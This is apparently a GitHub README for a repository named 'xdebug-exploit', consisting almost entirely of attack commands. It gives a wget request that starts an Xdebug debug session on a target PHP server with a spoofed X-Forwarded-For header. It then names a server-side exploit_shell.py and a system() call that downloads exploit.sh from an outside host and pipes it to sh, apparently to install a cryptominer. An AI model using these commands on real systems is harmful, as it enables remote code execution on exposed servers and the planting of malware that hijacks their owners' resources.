Skip to content

Latest commit

 

History

History
12 lines (6 loc) · 252 Bytes

README.md

File metadata and controls

12 lines (6 loc) · 252 Bytes

xdebug-exploit

Client:

wget -q -O - 192.168.1.160/1.php?XDEBUG_SESSION_START=phpstorm --header 'X-Forwarded-For: 192.168.1.160'

Server:

./exploit_shell.py

system("wget -q -O - http://impudent.miner.com:8080/exploit.sh | sh");